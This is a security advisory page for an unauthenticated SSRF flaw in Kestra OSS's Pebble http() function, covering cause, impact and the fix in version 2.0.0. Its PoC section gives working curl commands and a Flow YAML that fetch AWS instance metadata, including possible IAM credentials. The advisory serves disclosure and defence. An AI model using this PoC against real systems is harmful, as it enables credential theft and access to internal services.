GHSA-r56g-q4p6-m3p6: SSRF

Published Sep 17, 2026
·
Updated

Summary The Pebble template engine's http() function in Kestra OSS accepts user-controlled URLs without any validation, allowing Server-Side Request Forgery (SSRF) attacks. An unauthenticated attacker can import a malicious Flow YAML and execute it to access internal services, cloud metadata endpoints (AWS 169.254.169.254), or localhost services. The vulnerability affects all Kestra OSS deployments with default configuration.

Details The root cause is in core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java (lines 77-106):

1. No URL validation: User input is passed directly to URI.create() with no checks for private IPs, internal hosts, or restricted schemes 2. No IP filtering: Missing checks for 10.0.0.0/8, 192.168.0.0/16, 169.254.169.254, 127.0.0.1 3. No scheme restriction: file://, gopher:// schemes are not blocked 4. No authentication required: TenantValidationFilter.java only checks tenant == "main" — no authentication 5. Unconditional registration: HttpFunction is registered without any feature flags in Extension.java:180

PoC Prerequisites: bash docker run -d --name kestra-ssrf -p 8080:8080 kestra/kestra:latest server local sleep 30

Step 1: Create malicious Flow YAML yaml cat > /tmp/ssrfpoc.yaml << 'YAML' id: ssrfmetadata namespace: company.team tasks: - id: exfiltrate type: io.kestra.plugin.core.log.Log message: | {{ http(uri='http://169.254.169.254/latest/meta-data/', method='GET') }} YAML

Step 2: Import without authentication bash curl -X POST http://localhost:8080/api/v1/main/flows/import \ -F "fileUpload=@/tmp/ssrfpoc.yaml"

Step 3: Execute the flow bash curl -X POST http://localhost:8080/api/v1/main/executions/company.team/ssrfmetadata

Step 4: Verify — the flow execution output contains AWS EC2 metadata (ami-id, instance-type, IAM credentials if available)

Impact - CVSS 3.1: 8.6 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - CWE: CWE-918 (Server-Side Request Forgery) - Affected: All Kestra OSS versions (default deployment) - Impact: Attackers can access internal services, cloud metadata (AWS/GCP/Azure), localhost endpoints, and potentially escalate to cloud credential theft

Affected Software

2 affected componentsFixes available
maven/io.kestra:kestra-core<2.0.0
2.0.0
maven/io.kestra:core<=1.3.31

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade maven/io.kestra:kestra-core to a version that resolves this vulnerability.

    Fixed in 2.0.0

Event History

Sep 17, 2026
Advisory Published
via GitHub·05:15 PM
Data Sourced
via GitHub·05:15 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed?

All Kestra OSS deployments using the default configuration are affected. The vulnerable http() function is registered unconditionally and is not controlled by a feature flag.

2

What does an attacker need to exploit this?

An attacker does not need authentication. They need to import a malicious Flow YAML and execute it, allowing the Flow to supply attacker-controlled URLs to the http() function.

3

What internal targets could be reached?

The function does not filter private or local addresses, including 10.0.0.0/8, 192.168.0.0/16, 127.0.0.1, and the AWS metadata address 169.254.169.254. It also does not restrict schemes such as file:// or gopher://.

4

How can I determine whether my instance is affected?

An instance is affected if it is a Kestra OSS deployment with the default configuration and includes the unconditionally registered Pebble http() function. The described vulnerable implementation is in core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203